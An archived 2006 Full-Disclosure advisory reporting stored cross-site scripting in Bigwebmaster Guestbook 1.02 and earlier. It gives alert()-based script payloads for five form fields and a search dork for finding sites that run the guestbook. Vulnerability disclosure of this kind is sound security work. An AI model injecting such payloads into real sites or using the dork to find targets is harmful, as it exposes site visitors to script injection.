[Full-disclosure] bigwebmaster guestbook multiply XSS
- From: Javor Ninov <drfrancky@xxxxxxxxxxx>
- Date: Thu, 04 May 2006 19:02:11 +0300
Bigwebmaster Guestbook version 1.02 and down
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.
mail: xss@xxxxxxxxxxx <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>
intitle:Big Webmaster Guestbook
I DON'T CARE
Javor Ninov aka DrFrancky
Description: OpenPGP digital signature
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
- Next by Date: Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
- Previous by thread: Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
- Next by thread: [Full-disclosure] WebCalendar User Account Enumeration Weakness